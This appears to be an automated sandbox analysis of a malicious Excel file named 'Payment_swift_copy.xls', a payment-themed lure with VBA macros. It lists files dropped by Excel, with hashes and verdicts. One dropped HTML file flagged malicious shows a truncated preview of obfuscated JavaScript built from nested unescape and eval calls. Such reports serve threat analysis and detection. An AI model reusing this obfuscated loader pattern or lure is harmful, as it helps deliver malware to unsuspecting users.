            SHA-512:7D793D62373A12B3552DB533AE418F1B4E2151D0061D334593DCCA52A141516066656A51E8C74A73F9B578A1DF78FA29DD6C38BCB43276D13D75CEFD1E613C1E
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):44256
            Entropy (8bit):3.15066292565687
            Encrypted:false
            SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
            MD5:F1EC2E98B0F577B675156B13DCF94105
            SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
            SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
            SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):153152
            Entropy (8bit):2.344249846091516
            Encrypted:false
            SSDEEP:1536:MACQsA5DAtQaqrUPig97qG7bIQWkaYgJGXS:+5ZS
            MD5:37727D2936974D1B4DFDD4DA4BDFF6BE
            SHA1:4D5F14665F46E34F9BE183CDBB4CF74E1730A7F1
            SHA-256:12C4313220CCA2C2FE57BE8A74F1ADB505E9582F2FB0D3C9777F7C9A2DD8B16E
            SHA-512:E74F2D58453A88D048D5D992EF3390CB5CAC2D87FE965E09853CF66ABA2D711980F622BC3EFD27D3F5E3DA711D92E8EBAD3D68CE7C39D79B7820A5BC3CAB7634
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3149941480772696
            Encrypted:false
            SSDEEP:768:XOmAvcx1DW7ohBb66mQK4BTonxqQbApQK6c:+Swc
            MD5:69F3B4C7681671CD31BF67A30DA00CC9
            SHA1:975EA9AB1F23839E51BF9D99793578A8A2814CEC
            SHA-256:C480DAB69A832F58683A0C38DE5052E263EFAA4FC13EA53122134179DDD63DA8
            SHA-512:D66A004A9F5474695DA4E9E2E8DA32FF1AC907600CC277C98F2DA07BC605EBE6FD11BD672E7BA0EA6E844036A5CAF8131576397E8396BF9EACDA2DD6F6C74D1D
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):1293620
            Entropy (8bit):4.563127917199792
            Encrypted:false
            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
            MD5:F71C973B5E362DFD6408D6C009E5643E
            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):152108
            Entropy (8bit):2.360059885403749
            Encrypted:false
            SSDEEP:1536:bBwEotO4tU9MBFjvSO6E/cq9N6hvkFrRSYS:aO6S
            MD5:4CA59230F9D6D09A795465252057DFD3
            SHA1:32D9768DD55104FB95291EAC1FCB34A6E4C3469D
            SHA-256:C0583BEDCCF232CF705085DC44F98818DB0CDB6674A160B6511F5AC854BCA8EB
            SHA-512:9118B0D17805A452374530CD51AB9D7775960CE3765884648721526EF8B577BF21955BC8FA577E4983D0B6E1FCD1A50DD35CC04204354F78F8CC4C4B3DDAA126
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8208
            Entropy (8bit):2.1323927537045475
            Encrypted:false
            SSDEEP:96:Eeg2s88nDfgQI5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:E/oxfWZ4V79FdigmR7qii1Bo
            MD5:82DD757FF4FF1D3FB246856330735809
            SHA1:06748CA102F41C7C670C68279E9E9F2549397B1F
            SHA-256:EFD000D3D939DB8AC89F5CAE10B435A270C4C4DA79C6D816A38390908467136A
            SHA-512:BF27EE9844489AF1A509D500A8B400C79BCCE59FE380E33B67565D213A65A7153B2E65128FFA73F55C1CBF0686DD5EE0BB4F8AD5345B71AFF5BAC80D7B3BC4E1
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):150296
            Entropy (8bit):2.363261587100385
            Encrypted:false
            SSDEEP:1536:cniojtkZQJYAkQDnGvVf1oLJknhmUI/Fuuo:KG4o
            MD5:7997F869414305613092678A07861221
            SHA1:24763405CDC204082E9226CE10A96F797AFBB348
            SHA-256:2742098FAA948D04A1E46BB05E81BCF6B3B478822094928B8E633A7A2781E432
            SHA-512:0631324512374BF7FBCF317965304281815A2CA9E172D78D1748CAB1ED5393670A9E88833F4FC0136912A7807434EACDF136F06A7844E46E79DDECCA3A1EDB11
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):44256
            Entropy (8bit):3.147465798679962
            Encrypted:false
            SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
            MD5:36D8FF25D14E7E2FBB1968E952FF9C17
            SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
            SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
            SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3149941480772696
            Encrypted:false
            SSDEEP:768:XOmAvcx1DW7ohBb66mQK4BTonxqQbApQK6c:+Swc
            MD5:69F3B4C7681671CD31BF67A30DA00CC9
            SHA1:975EA9AB1F23839E51BF9D99793578A8A2814CEC
            SHA-256:C480DAB69A832F58683A0C38DE5052E263EFAA4FC13EA53122134179DDD63DA8
            SHA-512:D66A004A9F5474695DA4E9E2E8DA32FF1AC907600CC277C98F2DA07BC605EBE6FD11BD672E7BA0EA6E844036A5CAF8131576397E8396BF9EACDA2DD6F6C74D1D
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8184
            Entropy (8bit):2.134027179798306
            Encrypted:false
            SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
            MD5:331C2C9C442C76A749D84D57B5515818
            SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
            SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
            SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):109544
            Entropy (8bit):4.282675970330063
            Encrypted:false
            SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
            MD5:F7B9A8F20E64B2CB6B572BCBA5866236
            SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
            SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
            SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3149941480772696
            Encrypted:false
            SSDEEP:768:XOmAvcx1DW7ohBb66mQK4BTonxqQbApQK6c:+Swc
            MD5:69F3B4C7681671CD31BF67A30DA00CC9
            SHA1:975EA9AB1F23839E51BF9D99793578A8A2814CEC
            SHA-256:C480DAB69A832F58683A0C38DE5052E263EFAA4FC13EA53122134179DDD63DA8
            SHA-512:D66A004A9F5474695DA4E9E2E8DA32FF1AC907600CC277C98F2DA07BC605EBE6FD11BD672E7BA0EA6E844036A5CAF8131576397E8396BF9EACDA2DD6F6C74D1D
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
            Category:dropped
            Size (bytes):8896
            Entropy (8bit):2.8657765287956245
            Encrypted:false
            SSDEEP:192:tHaCEZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7Mhr+ZK0IHj66666P:t1EZFxaTOum2oum2M5KUJDVUKhCbGVfa
            MD5:2BF5E317F05B0A3F39B92266C469A5D8
            SHA1:DD829CC323C541CCEA26AB725247525785437882
            SHA-256:B61D43BAEFFD194BB1739DF15E836BC034D54749AED194B97B95296E962CD345
            SHA-512:E3DC8E28A116842C09A95431C30429B403FD0D67C60851B1C4CC17EAF94BA62CF9555D98CC88B1FA55EEC3087B6FEAA53830A7E120615F3C9F17F222F356C8CB
            Malicious:true
            Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%61%25%33%36%25%36%31%25%36%34%25%33%38%25%33%32%25%36%35%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%38%25%33%31%25%33%35%25%33%34%25%33%36%25%33%30%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):8.112143835430977E-5
            Encrypted:false
            SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
            MD5:AFDEAC461EEC32D754D8E6017E845D21
            SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
            SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
            SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):71
            Entropy (8bit):4.3462513114457515
            Encrypted:false
            SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
            MD5:8F4510F128F81A8BAF2A345D00F7E30C
            SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
            SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
            SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with very long lines (28660), with CRLF line terminators
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):0.19850094939079865
            Encrypted:false
            SSDEEP:1536:sJEmqUqmG+jCCu1I9r01MfjdoTLq/JTjPLLc/I7TP18gJkOYs9mRjYkzpHecaMvn:JmmgCCf9OMauT7J1xv
            MD5:6354E2D969F46B3D85CF1AAB6ACC71B5
            SHA1:D56E8E62DF890066795A4B8E2B149B92BD1FD364
            SHA-256:85BD4E681419A55E40D59598D8287A5CE7FDEDC7821DC9890DC74C5F8D57301B
            SHA-512:6BDE6D6E9DD44F1A5C43B25B6E96A6750D8A15659E678826E9C592EAA061D5B62A9C65B2F0E79E1444DED2C6844432B9B3F9A8C7EA7CF4307DB6D32AA63ABF26
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/16/2024 09:05:24.290.EXCEL (0xA88).0x8CC.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":18,"Time":"2024-12-16T09:05:24.290Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T09:05:23.7597390Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T09:05:23.7597390Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T09:05:23.7597390Z\", \"C\" : \"\", \"Q\" : 8.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N\
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with very long lines (28825), with CRLF line terminators
            Category:dropped
            Size (bytes):410322
            Entropy (8bit):5.284972274245398
            Encrypted:false
            SSDEEP:
            MD5:ECE9A36CCF631D1881BC2972ECF294FE
            SHA1:BA0F83CC4305B8EF879791931A5FC67FD077FCC4
            SHA-256:97B4AEE4E770E4054CA302C2258F3613AAADD59E4FB3484162649716D0A8CB6B
            SHA-512:C52C133B412AA71A5B9340822595F8E6BF29A44FE193A1F71BA41BB01154BFB7B9363B0FD0D3DD1F1DC6A43354B490F798905A2EBA90FE9CE2E0074C1943D7B4
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/16/2024 09:06:53.888.EXCEL (0x1FFC).0x1998.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-12-16T09:06:53.888Z","Contract":"Office.System.Activity","Activity.CV":"d8z2Bpon8EmhOyk6nZpSrQ.1.12","Activity.Duration":14,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...12/16/2024 09:06:53.903.EXCEL (0x1FFC).0x1998.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-12-16T09:06:53.903Z","Contract":"Office.System.Activity","Activity.CV":"d8z2Bpon8EmhOyk6nZpSrQ.1.13","Activity.Duration":13081,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersion"
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):54272
            Entropy (8bit):7.354307290251543
            Encrypted:false
            SSDEEP:
            MD5:1DD99CE7B825B485B2B78247C67F72CB
            SHA1:ED2FF8C3C7163168B3C6999663C34891734109B3
            SHA-256:3C980F7F55B7814FB9ABCB8FE36CD83A1B564FA848F841CC8E24132B9EAB88F4
            SHA-512:58B018D5AF0D47F0F02BABD6F1F6A3668C70A56CF5BBB77630EF9ECF2DF985E7B93C73A29EF6852270BAC362578DDDACF792D68F6A4C725CE3345F8448A4BC73
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):7.474866706028188
            Encrypted:false
            SSDEEP:
            MD5:E9AD01833E595CC919A3D742B6BE799F
            SHA1:144E84A5B416A4476D7243A68EB1E9AB4EA229BF
            SHA-256:58E0C3DFC389CB51C773EB541E1CBF5A51560038CAB3812F353EE5661E0536FA
            SHA-512:18B805196AC62459931EDD5BDFD329B23314650FB48105EFA5FA8DCC005B2FA340DB7A1950895EE421E86AFED98B47D02D23039AA4D19575CE5E5BF4AB8DD71F
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):208896
            Entropy (8bit):6.597108397381584
            Encrypted:false
            SSDEEP:
            MD5:0631D007CCFD86834640531620AC81D1
            SHA1:9646D9A4CABAB43514D8D95D81211FF01058C2A7
            SHA-256:5A0452312F3A425A2784A9E1DD52FCAC2F6108619C98472D12B3CA0D2374121D
            SHA-512:AF97BC09E30B00326A44E75755B5327064347C889334B7F9BE7E40E18ACE528026CBD9D2C91906F1159A502BB00CB39AFB4A0B9F3177AEB92D8E17418322C41E
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 09:06:52 2024, Security: 1
            Category:dropped
            Size (bytes):837120
            Entropy (8bit):7.630255694699776
            Encrypted:false
            SSDEEP:
            MD5:14DC76676888C05D8A484C93272C2275
            SHA1:CABF8D7383562CF74184EF00233590C90910AD9B
            SHA-256:5F14177B1F3CD030CEE5168526E36CA2FABE95C3723F49033A1548BEF9600563
            SHA-512:DF5DEE1D23B58F2A59E0D274AB5D413BD630D219B290958CA46D44A24345747B31D7BC0E54FE7E2DD696390B96C3D08BA404D35AAFDC0CB0754D2C9D8AA90822
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 09:06:52 2024, Security: 1
            Category:dropped
            Size (bytes):837120
            Entropy (8bit):7.630255694699776
            Encrypted:false
            SSDEEP:
            MD5:14DC76676888C05D8A484C93272C2275
            SHA1:CABF8D7383562CF74184EF00233590C90910AD9B
            SHA-256:5F14177B1F3CD030CEE5168526E36CA2FABE95C3723F49033A1548BEF9600563
            SHA-512:DF5DEE1D23B58F2A59E0D274AB5D413BD630D219B290958CA46D44A24345747B31D7BC0E54FE7E2DD696390B96C3D08BA404D35AAFDC0CB0754D2C9D8AA90822
            Malicious:true
            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Dec 15 15:10:21 2024, Security: 1
            Entropy (8bit):7.765557008278558
            TrID:
            • Microsoft Excel sheet (30009/1) 47.99%
            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
            File name:Payment_swift_copy.xls
            File size:1'096'192 bytes
            MD5:3c31b1b6455e98d02fde97673287f260
            SHA1:10eb67ae8645458996d5eeb3101504ceaf446d85
            SHA256:cf7373204fc102aa8f3d4ea5a8ac56db2d6227f0e9610c8089dfca7b3477034a
            SHA512:db1549e367557e2cb689972d39d79094e778cfa78302f5ecf42d94dd39ba9ab7a5ee31a2e03baa0d449302aad8dbe1044868ddb5c4403a055b52b1716a10f3ac
            SSDEEP:24576:KBaubARM8A+8Z+jSSs8eqdWUdt4IsOqAf:KWU+XjSS4quIP5
            TLSH:A33501E5B68D6B42C61A523471F7579E1714AC03D902423B37F877291BFBAD08A03F9A
            Icon Hash:35ed8e920e8c81b5
            Document Type:OLE
            Number of OLE Files:1
            Has Summary Info:
            Application Name:Microsoft Excel
            Encrypted Document:True
            Contains Word Document Stream:False
            Contains Workbook/Book Stream:True
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:True
            Code Page:1252
            Author:
            Last Saved By:
            Create Time:2006-09-16 00:00:00
            Last Saved Time:2024-12-15 15:10:21
            Creating Application:Microsoft Excel
            Security:1
            Document Code Page:1252
            Thumbnail Scaling Desired:False
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:786432
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
            VBA File Name:Sheet1.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Attribute VB_Name = "Sheet1"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
            VBA File Name:Sheet2.cls
            Stream Size:977
